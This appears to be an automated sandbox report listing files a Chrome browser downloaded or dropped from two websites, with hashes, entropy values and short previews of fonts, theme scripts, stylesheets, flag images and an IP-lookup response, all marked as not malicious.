                                                                                                                                              Preview:/* cyrillic-ext */.@font-face {. font-family: 'Oswald';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/oswald/v53/TK3IWkUHHAIjg75cFRf3bXL8LICs1_Fv40pKlN4NNSeSASz7FmlbHYjedg.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Oswald';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/oswald/v53/TK3IWkUHHAIjg75cFRf3bXL8LICs1_Fv40pKlN4NNSeSASz7FmlSHYjedg.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* vietnamese */.@font-face {. font-family: 'Oswald';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/oswald/v53/TK3IWkUHHAIjg75cFRf3bXL8LICs1_Fv40pKlN4NNSeSASz7FmlZHYjedg.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 16656, version 1.0
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):16656
                                                                                                                                              Entropy (8bit):7.988049904533841
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:iQHyQnxGXgY5+IR6CfOwEPr/cz5h3HCu3vGTe/SF+leJksUhEdHKwSKt+IS:PDnhK0w6r/ihCu3We/7ORXt7S
                                                                                                                                              MD5:B829329CC3E60A89F54B72555FBAB6DD
                                                                                                                                              SHA1:0F18B292A1384E46BBA4257DE55C6AA3C344D43F
                                                                                                                                              SHA-256:F52BCE4306CC4EB93E5AADF81EB15B4FEBDB301396539F261BA84018E601FF82
                                                                                                                                              SHA-512:40495CA37DAC3252A6DFF423AB2680E3C7B223A64C3EA33DC8ACDA951DC98F164B1F88F7CEC6583CBCF9252692E048F913EB033C12D5DF4A765A5466D4704033
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://fonts.gstatic.com/s/dosis/v32/HhyJU5sn9vOmLxNkIwRSjTVNWLEJBbMl2xME.woff2
                                                                                                                                              Preview:wOF2......A........$..@..........................d..n..2.`?STAT*........D..f..z..6.$..p. ........./...6.....w..F..8.....t@.....k..c.....mF ..V..]Mf.EU.a+2{...|........y......... ..F...........$#Ga.{JM.......u..|./$ ...~.n.0..=..3...8...4.......4P.%2$!..._..;?.o.......>1rQ&F...E..V.........i:.U...w.\...7f..M.$M.45CZ..(........ ..g.3..c.O......>....0..#..3.8.....v...4"5*....@.8.|..&..fs..^..4.(;...J./._X.>xF..y.._>t.`H.jf...t....oV.....gR.o...$...A.Y.].....J.[....~U>@L{.Y. Op2.|..4.......l..Zx...4.Z{.,.n..-......3)......hw....e.<|....~..9.Po7+..>+..3=.p..RooB..CnR..!+..)(..4..P..x.B....jn.....a..B.43..v.Z..........?.|....TX..uB.a...M.....7.=.#.0..U..y.i.Y.i4..Mr.....H.....l.x...+.T]....R..E...r.w.CJ.!qJ......k8.....79..Uh..lX.D.s&~z3.\...(.....9.....+-..Z.....Dd.A. !.._....P.@ ........3..... .0:...DI.d..1".....iU~.)s0..l!..Jk.l.@....?c.KH....b......k.....@.V8.....`...LGA.W.j.........}......SK..U}...J.g..C....!.fm.N(].fH...(=}d...8.|F<......\h..
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (359)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):5464
                                                                                                                                              Entropy (8bit):5.003279115233775
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:loflPTp3QAn5sTX9Ffi+Hso6WHs0yJ1WboU5eH8UslIGum4YF4lB8nlc7SlhYsX:0F+j9J/nyOG3sSg3Fa6naWYA
                                                                                                                                              MD5:912E96BBA6658C45C3F38D7FF4240482
                                                                                                                                              SHA1:A0426B5A44D0B1C36AEF343BC72EAD327B80A531
                                                                                                                                              SHA-256:8E60AA4573BBF0824ABF6595D86B033EB2686F848CF6498523B86C9175211FBD
                                                                                                                                              SHA-512:EDDF37D5B0AC70CB7D1BC5AF1ECBFF9D8F66C325450357344ECAA4A0DED4D3E0FA8C410B77B3FCB71EBF06907166B3676C048FC4AB9D95AAADFE6245BAA4074B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/js/avia-snippet-lightbox.js?ver=4.5
                                                                                                                                              Preview:(function($).{.. "use strict";....// -------------------------------------------------------------------------------------------..// Ligthbox activation..// -------------------------------------------------------------------------------------------...$.avia_utilities = $.avia_utilities || {};...$.avia_utilities.av_popup = {....type: ....'image',....mainClass: ...'avia-popup mfp-zoom-in',....tLoading: ...'',....tClose: ...'',....removalDelay: ..300, //delay removal by X to allow out-animation....closeBtnInside: .true,....closeOnContentClick:false,....midClick: ...true,....fixedContentPos: .false, // allows scrolling when lightbox is open but also removes any jumping because of scrollbar removal....iframe: {.... patterns: {.... youtube: {.... index: 'youtube.com/watch', .... id: function(url) { ..... ..... //fetch the id .... var m = url.match(/[\\?\\&]v=([^\\?\\&]+)/), id, params;.... if ( !m ||
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):283
                                                                                                                                              Entropy (8bit):4.999257877416297
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:tI9mc4sltj4JIC/MDMwlRtuuHWqlqRtz2Z2XYblqRtHFS3Ihg5lC:t43P86MwR3xgzN4gHFSYQI
                                                                                                                                              MD5:AB61F31EDF4AD95B5AE00AFF3BE99197
                                                                                                                                              SHA1:2224F01348B870C064900BCE135BFD7888A5B745
                                                                                                                                              SHA-256:6C62F886220C3BCB0725AC86A62DA7D9A80C33B4525C9BFAFE4F540649FF0090
                                                                                                                                              SHA-512:404B1EBAF730083A2535EE61929A4A6F9A5B2C31707682F06A4936AAC6F94DCE772CC82217CB9E05BB8AAE86B56E76040811DB6FBDD573084A8E34ABF2A66DD2
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" id="flag-icons-ru" viewBox="0 0 640 480">. <g fill-rule="evenodd" stroke-width="1pt">. <path fill="#fff" d="M0 0h640v480H0z"/>. <path fill="#0039a6" d="M0 160h640v320H0z"/>. <path fill="#d52b1e" d="M0 320h640v160H0z"/>. </g>.</svg>.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):4724
                                                                                                                                              Entropy (8bit):4.72551908428837
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:yrj3WJ7joCcSNg/g0GfN5gUC7g1jgnNpn5jgUGhqhxBxty0ufhT110FFff5kAT:gGJ7joCcSNg/gbgUmg1jgnNp1gUGhqhF
                                                                                                                                              MD5:7276681E0E7D64FD84BA4E7B36D67C36
                                                                                                                                              SHA1:A6AF31FE2B8DC239AD51233F1FBEDBB26B5F01E6
                                                                                                                                              SHA-256:91580DB5F8A95EAF1D2BBB373AB97D74D1EAA6547D849D3ACEC12056F4496D9D
                                                                                                                                              SHA-512:8389891FCD9B8EE8C805DBA00794F8B6078E8146185ECC972AF2BC936AD56A173EB7840FEB94289091F0B8EC7F5A5D1CA789BE8BCB458AAF3D17DB8E704D7A18
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/toggles/toggles.js?ver=6.0.9
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// Toggle shortcode javascript.// -------------------------------------------------------------------------------------------.(function($).{ .."use strict";....$.fn.avia_sc_toggle = function(options)..{...var defaults =...{....single: '.single_toggle',....heading: '.toggler',....content: '.toggle_wrap',....sortContainer:'.taglist'...};.....var win = $(window),....options = $.extend(defaults, options);.....return this.each(function()...{....var container .= $(this).addClass('enable_toggles'),.....toggles..= $(options.single, container),.....heading .= $(options.heading, container),.....activeStyle = $(container).attr('data-currentstyle'),.....allContent .= $(options.content, container),.....sortLinks.= $(options.sortContainer + " a", container);......heading.each(function(i)....{.....var thisheading = $(this),......content = thisheading.next(options.content, container),......headingStyle = th
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 1222 x 630, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):1169493
                                                                                                                                              Entropy (8bit):7.994471264780519
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:24576:HdO1c3spGncYV5WGtNETwvYIaoN+KuYbY/MoXhcZWyVkA7d:sc3rn/VcTLooQcEYaZDVk+
                                                                                                                                              MD5:6271955F458C0A20333167E528E476F3
                                                                                                                                              SHA1:B36725D616F004F0D73E442F9B857476DE9360B7
                                                                                                                                              SHA-256:25DE885311B8CC53EF87120CC5CBF8A575FF1DFA8893F022FC6041C023CFD4FB
                                                                                                                                              SHA-512:77F7D08366BA4AEEEC69785025C52ADA8A640EDB661B68CF997E3194938C526CE6F391E7BFB703DD935411D110D951777D8C67F018FE105577146F9143DACF14
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/uploads/2024/08/Schermata-2024-08-29-alle-09.27.20-1222x630.png
                                                                                                                                              Preview:.PNG........IHDR.......v.............IDATx..K.v....]U.^.O.`.F.`.q8.FP@i.@..H.i!h./..~..%...D.... .B..;...9...U5....%m...y..c.Qu.u..d.A ...@p.......C.3....3.0@$.......b.....Z./.E..B.l...... "PU.m.w.~)~p...m.....wh......_-..%yM.: ..@.|..........'_....J.......3.g......tq....}.......{...@.......Z....o._..~..b..:.......u......6.}..5Z..D%o...}..u..`"X...g......o.g;......../U5.M^.B....g.5..K.9.>......?.......!.......5..;....l..m,U........4.....1..^q...|...6X...y`......S..?O...].x....:[.....{...hg_...f.*.l.....AU...`.........y......w......j....v..5<..ym.o...O......Y.....r...........M.eB.N_....Z.I.U......v.<....3*..Z.........?.p.....}+.kzB..y..}...2.........9k1.C.0..f......y.$..b._.l....i...`. ..~ ..|43....Ep.3.<..?..;.a~-U..7.{..k`..aP.....l3,.7:;...@d........#.1..S.~...7|.o,Yg.._...?..w.. ..;.pV........<....K..#v...aA!b...........C..3:.}..R.......Y=.....`........>..yo=.HbO...5!}}..\...j...L.g+.'....U.O<ST'.!...c.h...."......y...q..5..v..-...
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 62472, version 1.0
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):62472
                                                                                                                                              Entropy (8bit):7.996751157605304
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:1536:mt3IPiBbeBXYTcV2uesj65wJ6z4lhTg3Wqo9XsVEV:mNIMbeBIpE65wDlpgO9XsVEV
                                                                                                                                              MD5:B75B4BFE0D58FAECED5006C785EAAE23
                                                                                                                                              SHA1:92DA6E3C7121E21CDFDE25EF08797A3937A683E1
                                                                                                                                              SHA-256:5C7DF99DF232586111917083A85AA31B82EE29E48CA2990E13FAE0C0663A923F
                                                                                                                                              SHA-512:34ABBE454074176EC90D90DD8125339EEC1348943EF77C8529C5D0DB9DF593802A47F6A52CEA37E2ED1F7DA609893645B561AC0BC0054A06D81D367D2C702CCF
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://forms.pienissimo.com/fa-solid-900.9ef50a04ef2ee9703d69.woff2
                                                                                                                                              Preview:wOF2............................................T.V..F......>.6.$..x..|.. ..z..Q[..r'r.....m.8....H.r....7ZH..A..V.S.F......Q......|..m.[..@T..b..p.=)pS..3q...-......]LC{i{s .........f.W..b.. &8V.7...LX../..w..82."..b.%......f......DB..Xv.....f-.n2..k.c...-+m.......xG.G<R..Q.F.5..`W+.$J.-;....=..3A.u[N;..g.oX....5...G....Ts|o...S...9...o..?..g...h....jo....Z1.v..L._..#O.....H...y..........{....,2$.H".E..f..L.w...pj.APg........".<.|.g.B.d..;$a.|.c.H..$..p0..$..8.'8..Dl..[p..U...:.........@RJ<..... @.....C..~k.H..i..=.MwO...........9...0.EDP4X#I7...{[...o..@o...$O.M.Rwkq!f..xS....h.T/..%....$........e........{.*..M.vV._....i3xw.N..........&Mo.]I..d..(.Be...o93?..p...u...d.......M.q"K........b...6.$.-'.....9...7...e/.uR}...r..I.=....<*..........&..x.9.53oA.<.+1m.A.V`./..Ea.E......./..yi.?j...R.:m=..L3.?.`....<s....u...t..L......k/.o...%.2..A...c....va@........k`ZB(h.....=N...n.E....&.h..r.*.B].....?l..B....U5.U....,...|+...(......
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):5508
                                                                                                                                              Entropy (8bit):4.98286767935578
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:1UNBJhwmKXLtWfXzmbKIpyVTbJRfAiiBo2eg/8i28pgb:1UNZwmKXLtW6b9p2ZRoF62eg/F28qb
                                                                                                                                              MD5:7F7C3B86FF738A45E2AFE40996830ECB
                                                                                                                                              SHA1:8CBE76FA15E2433583A69F79CFB2E059C563E230
                                                                                                                                              SHA-256:6F481F9693AF25873DBB6A7BF4DFEEF5B19B5EDF0BBF50C2873017879EDBC988
                                                                                                                                              SHA-512:770487FD030FE922FF7A442FF1A277D7CEAC01F78D4115EDB3635EF3F9526B80434A3B01151BA6B1B403758F11441A4A1C863338CF44DC63A1C037D332F39DA6
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/comments/comments.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.#Comment.====================================================================================================================================================== */...h4#comments{.margin-bottom:30px;.}..#respond{.margin-top:20px;.}...commentlist ul {.border-left-style: dashed;.border-left-width: 1px;.}...children .children .says{.border-bottom-style: dashed;.border-bottom-width: 1px;.}.....miniheading, .author_name, #reply-title, #top .logged-in-as, .dynamic-column-title{.font-weight: 600;.letter-spacing: 1px;.}..#comments span, .minitext, .form-allowed-tags, #reply-title small, #commentform label{.font-size: 0.85em;.display:block;.letter-spacing: 0;.text-transform: none;.padding-top:8px;.line-height: 1.5em;.font-weight: normal;.}...comment_meta_container{clear:both; float:none;}..#top .commentlist{.margin:0;.padding: 0 0 10px 0px;.bord
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):91815
                                                                                                                                              Entropy (8bit):4.491478757594995
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:3xMcdm6KY4kmAq6RPewyYd491pPiv1iuLVg6wuU9GW/b/qOuD+1TcKszCWsXiKiB:Wcdm6KY4ky10d4vpPiv1P
                                                                                                                                              MD5:91221AEBA452AEB57C55826C70920835
                                                                                                                                              SHA1:A9556AB0E13A9FB6F2BED11251C35044864A0B52
                                                                                                                                              SHA-256:6FE80291CD9BE7F06D9F205081C3A5264DA531B49E40DDBE63BDA08A83C1AFD9
                                                                                                                                              SHA-512:C3888A7C6E7C9F985F4801738DA1B1B405A7D9A9A95906C9B17926C627F7C100C191D684ECE752906E72406574D92E3E42D0AFFD2EFABDAAAFC18BF1AB6B8E42
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://forms.pienissimo.com/es.e3db1b5f8a2ec8ae8764.svg
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" id="flag-icons-es" viewBox="0 0 640 480">. <path fill="#AA151B" d="M0 0h640v480H0z"/>. <path fill="#F1BF00" d="M0 120h640v240H0z"/>. <path fill="#ad1519" d="m127.3 213.3-.8-.1-1-1-.7-.4-.6-.8s-.7-1.1-.4-2c.3-.9.9-1.2 1.4-1.5a12 12 0 0 1 1.5-.5l1-.4 1.3-.3.5-.3c.2 0 .7 0 1-.2l1-.2 1.6.1h4.8c.4 0 1.2.3 1.4.4a35 35 0 0 0 2 .7c.5.1 1.6.3 2.2.6.5.3.9.7 1.1 1l.5 1v1.1l-.5.8-.6 1-.8.6s-.5.5-1 .4c-.4 0-4.8-.8-7.6-.8s-7.3.9-7.3.9"/>. <path fill="none" stroke="#000" stroke-linejoin="round" stroke-width=".3" d="m127.3 213.3-.8-.1-1-1-.7-.4-.6-.8s-.7-1.1-.4-2c.3-.9.9-1.2 1.4-1.5a12 12 0 0 1 1.5-.5l1-.4 1.3-.3.5-.3c.2 0 .7 0 1-.2l1-.2 1.6.1h4.8c.4 0 1.2.3 1.4.4a35 35 0 0 0 2 .7c.5.1 1.6.3 2.2.6.5.3.9.7 1.1 1l.5 1v1.1l-.5.8-.6 1-.8.6s-.5.5-1 .4c-.4 0-4.8-.8-7.6-.8s-7.3.9-7.3.9z"/>. <path fill="#c8b100" d="M133.3 207c0-1.3.6-2.3 1.3-2.3.8 0 1.4 1 1.4 2.4 0 1.3-.6 2.4-1.4 2.4s-1.3-1.1-1.3-2.5"/>. <path fill="none" stroke="#000" stroke-width=".3" d="M133.3
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):31458
                                                                                                                                              Entropy (8bit):4.936956087978602
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:J2Cxonb1/8rT68elt3uhcOt116+GgRCk5nacCaaYeYGBdZalfBSZTf:Maonx8r9eHuh3OUZHudZgBc
                                                                                                                                              MD5:77FDCBA71C41E4FF2B29F558A4193F1A
                                                                                                                                              SHA1:B78907AD116B273E1CAA89BAA6BFC00E8F433457
                                                                                                                                              SHA-256:419F6F322AFD038F55E29DD8EE201DD06C1895D77BD6888B3AD1C3FF936384B0
                                                                                                                                              SHA-512:48D52FFA1A04D7E849349E6B7E84BCA99461984CA30CC91C4F1D7FDCF4F1ED453260C7CA5CBB6ECAEABFD7055276A71BB5A84A3614FADBC3C78DD14FA4F76215
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:/* ======================================================================================================================================================.Avia Slideshow.====================================================================================================================================================== */..(function($).{. "use strict";...$.AviaSlider = function(options, slider)..{...var self = this;......this.$win. = $( window );..... this.$slider = $( slider );.. ...this.isMobile = $.avia_utilities.isMobile;.. .. this._prepareSlides(options);.. ...//default preload images then init slideshow.. $.avia_utilities.preload({container: this.$slider , single_callback: function(){ self._init( options ); }});..}...$.AviaSlider.defaults = {.....//interval between autorotation switches...interval:5,....//autorotation active or not...autoplay:false,......//set if the loop will stop at the last/first slide or if the slides will loop infinite...//set to fals
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4249
                                                                                                                                              Entropy (8bit):4.2791559324031185
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:l7EXF3SFOrbSfS0YCeLw/M81Xif1Ile+96Yczd1Pf/H:qXF3SFOrbSfSXLKM81Xif1Iw+96Ykdpn
                                                                                                                                              MD5:40BF628F0D1CA7E9E8B6A2372F82CAEB
                                                                                                                                              SHA1:A8710B38F79E61346D34BD61F596D2DD6D7EB0FF
                                                                                                                                              SHA-256:802E6AC589C74C9617F5160E5FB0A71D37CE9BCB984E65AE436D1C5D149770ED
                                                                                                                                              SHA-512:534EB010B4EEDB303C7508444888EEA377D38433CCFD406FEFA1724D69D62B237CFAC793A7007222E1AE8E5FF4A5FE5EFD0805FB8B6B06AD9C7A00F0E0DF896F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:(function($).{.. "use strict";. . $(document).ready(function(). {....// decreases header size when user scrolls down. avia_header_size();. });. . . function av_change_class($element, change_method, class_name)..{....if($element[0].classList)...{....if(change_method == "add") ....{.....$element[0].classList.add(class_name);....}....else....{.....$element[0].classList.remove(class_name);....}...}...else...{....if(change_method == "add") ....{.....$element.addClass(class_name);....}....else....{.....$element.removeClass(class_name);....}...}..}......function avia_header_size(). {. var win....= $(window),. header = $('.html_header_top.html_header_sticky #header'),. unsticktop..= $('.av_header_unstick_top');. . if(!header.length && !unsticktop.length) return;. . var logo = $('#header_main .container .logo img, #header_main .container .logo a'),. elements = $('
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 48236, version 1.0
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):48236
                                                                                                                                              Entropy (8bit):7.994912604882335
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:768:uj6JxavgLx5rjTH3CdZ3y11o4uMb2IVEhiB6z6GAAHJApICtBgso6HaOjTXHRWK:ujoa4LxZPCdm3B2IVEhiB62apApISxos
                                                                                                                                              MD5:015C126A3520C9A8F6A27979D0266E96
                                                                                                                                              SHA1:2ACF956561D44434A6D84204670CF849D3215D5F
                                                                                                                                              SHA-256:3C4D6A1421C7DDB7E404521FE8C4CD5BE5AF446D7689CD880BE26612EAAD3CFA
                                                                                                                                              SHA-512:02A20F2788BB1C3B2C7D3142C664CDEC306B6BA5366E57E33C008EDB3EB78638B98DC03CDF932A9DC440DED7827956F99117E7A3A4D55ACADD29B006032D9C5C
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS-muw.woff2
                                                                                                                                              Preview:wOF2.......l......D...............................O..B..h?HVAR.x.`?STAT.$'...0+...|.../V........+..2.0..6.6.$..`. ..~......[B4q.....t..P.M_.z...1..R.S*...u.#..R....fR.1.N.v.N.P...;.2........!Z......Qs...5f.G.K.an2&....2...*......C.H.t..N!.....nh.<(.vN.....j.._.L.P.t..Ai.%.............._I.i,..o,C.].H.X9.....a.=N....k.....n.L..k.f.u..{...:.}^\[..~5...Z`...........`!...%4..,...K0..&.a/....P....S....m.Z......u...D.j.F...f.0`I.`.`.h#..)(FQ.F!o$........S.).MV8%Rh...r...x...T]$.=......Y...!.3.&U..."....Q....{.l/0..d..4iJ/..}...3....i[Z..NG.WD...>.[U..Q.h..@m.=..S...1C2...d...<..v.?.q.f..n...OUz.....&Z......Z."..N.....n...9.B..C..W....}...W..6Zs.i.+Z........jB.n..x.8M.....q..@I....-.%..,C,..K..#.2...4)/.v_..x.<....t.....%[.4?.=j.V..jj''..W.u..q....I.L.=......E...\.M.7{.>......W........C.`...,9$......\..o........y...4A..m.P.,X..=?.:................wF`..+.P..........M!.4.......l.>M..t.ff5r..^..Z.g...!fA,hIIQ...e.R>B.AH.VuX..>..\.=.ky...1>C....>C.c.;...6D.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3870938
                                                                                                                                              Entropy (8bit):5.430304312089216
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:49152:Fl/TwBsh62MXV8v9JbM8XngcgZ5wDh6Jsha0JBotQ3QqxxrClUauh8CP:X/Two3QqxxT
                                                                                                                                              MD5:157BABAF461864D2C0F3C11D19D94AD3
                                                                                                                                              SHA1:22AA3C79841BDC6CFA6E4CC503DD14C18A8DC964
                                                                                                                                              SHA-256:51A6E76BC6227CDA4BDA4E97E41E579C3DC6E911689991B0A23D8280720D61BC
                                                                                                                                              SHA-512:A51EBE9C8730AEB0EAA8A037A8C3C7B26546C8BD988BCA9886CB3C3763BE252DFDF306D36F86CB4D8415CABD18CC0C2A4AD09FE471A6CC1DCEFBC210DF15FBCA
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[1],{0:function(e,o,i){e.exports=i("zUnb")},"1IWC":function(e,o,i){var n,a,t;!function(c){if("object"==typeof e.exports){var r=c(0,o);void 0!==r&&(e.exports=r)}else a=[i,o],void 0===(t="function"==typeof(n=c)?n.apply(o,a):n)||(e.exports=t)}((function(e,o){"use strict";Object.defineProperty(o,"__esModule",{value:!0});var i=void 0;o.default=["it",[["m.","p."],["AM","PM"],i],i,[["D","L","M","M","G","V","S"],["dom","lun","mar","mer","gio","ven","sab"],["domenica","luned\xec","marted\xec","mercoled\xec","gioved\xec","venerd\xec","sabato"],["dom","lun","mar","mer","gio","ven","sab"]],i,[["G","F","M","A","M","G","L","A","S","O","N","D"],["gen","feb","mar","apr","mag","giu","lug","ago","set","ott","nov","dic"],["gennaio","febbraio","marzo","aprile","maggio","giugno","luglio","agosto","settembre","ottobre","novembre","dicembre"]],i,[["aC","dC"],["a.C.","d.C."],["avanti Cristo","dopo Cristo"]],1,[6,0],["dd/MM/yy","d MMM y","d MMMM y","EEEE d MM
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):21
                                                                                                                                              Entropy (8bit):3.594465636961452
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:YMb1gXME2Y:YMeX32Y
                                                                                                                                              MD5:909AD59B6307B0CD8BFE7961D4B98778
                                                                                                                                              SHA1:49F8111D613317EA86C6A45CD608DC96B1C8451B
                                                                                                                                              SHA-256:FBCEC43F243A7B7F955E498B7FC37CB5EDF615156529AB8A039BBBCFA52C1829
                                                                                                                                              SHA-512:8FDFFFB73C90ACDC732A0F29257CACEEDAAA28FCAF8E779C5390BDEA9CDE4DE3C8BD005BBEC9B3B7972C787E233D8D8E218D45B6EB2C3AD40EB5E3A2A1EAC3B8
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://api.ipify.org/?format=json&doNotCheckUser=true
                                                                                                                                              Preview:{"ip":"8.46.123.189"}
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (9284)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):245020
                                                                                                                                              Entropy (8bit):5.453937870555613
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3072:6FLeYH8W1WJ/37Oec8NteqZEbkxZNsucrl0xYurPK7d3fCX:6FLeYcgWJzm8NNfFcrHurPK7d3KX
                                                                                                                                              MD5:C281685D97DFB326E485D666280531A0
                                                                                                                                              SHA1:8E0F1416D573E76DDA51F3640614C004D44C4520
                                                                                                                                              SHA-256:4B851BD9AF5635C2682387427EB718D453B8E7AEEFDBB01C8521AB32A49004B3
                                                                                                                                              SHA-512:5AC00DFDC037F1ED98B7635FB1CBDD816FCBF72DD26BD3E34C49E13544ACE623ED50A9D59B9696DAE7CC1384DBA0529A1AFB78A80032A4ED10006A4F6496ED82
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (15660)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):18617
                                                                                                                                              Entropy (8bit):4.746740754378132
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:Unb0kcuPTb9Uh31//bEP+XgA1N9CleffJmp3:Ub0/U9Uh31//YWXgAJffC3
                                                                                                                                              MD5:32BEB68A374E3AEAC00ABDF9E12B84EA
                                                                                                                                              SHA1:B5D18AA625E8696DD9D07CD0869337717B211AE0
                                                                                                                                              SHA-256:5AAD5FBD4238981A9FF5E2772FF1353DFE1A801FB49542FE157418C1438F7782
                                                                                                                                              SHA-512:8FC41038B4DC2FC2465422FB3144B71C2ACD2F4552607369314FEC9B7F561B7A3919CDC4219DF2089395241168FFBFE29E67DDDA834E66C27E4C88066C8F4496
